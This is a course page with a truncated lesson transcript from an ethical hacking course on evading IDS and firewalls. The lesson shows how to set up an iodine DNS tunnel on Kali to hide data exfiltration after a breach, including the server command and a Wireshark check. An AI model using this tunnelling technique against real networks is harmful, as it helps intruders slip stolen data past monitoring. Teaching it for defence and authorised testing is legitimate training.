From the course: Ethical Hacking: Evading IDS, Firewalls, and Honeypots

Unlock the full course today

Join today to access over 24,700 courses taught by industry experts.

Tunneling through DNS with iodine

Tunneling through DNS with iodine

From the course: Ethical Hacking: Evading IDS, Firewalls, and Honeypots

Start my 1-month free trial Buy for my team

Tunneling through DNS with iodine

- [Instructor] Once we've breached the system and want to start sending data back, we might want to hide our exfiltration in a protocol which is unlikely to be monitored. One such protocol is DNS and Kali comes with a tool called iodine, which is designed for exactly this purpose. We'll normally run this using a registered public server but for the purposes of understanding how it works, let's set our iodine server up on Kali. We do that quite simply by entering sudo iodine D, minus F, 10.0.0.1, test.com and we'll enter our password for the transmissions. Okay, we've instructed iodine to create a new virtual network using the IP address 10.0.0.1 with a DNS name of test.com. Let's check in Wireshark to confirm this. We can see we've now got a new network adapter called DNS0. Let's start capturing traffic on that. I've already installed iodine on Hydra, so let's use the client to connect to our server using the same DNS…

Contents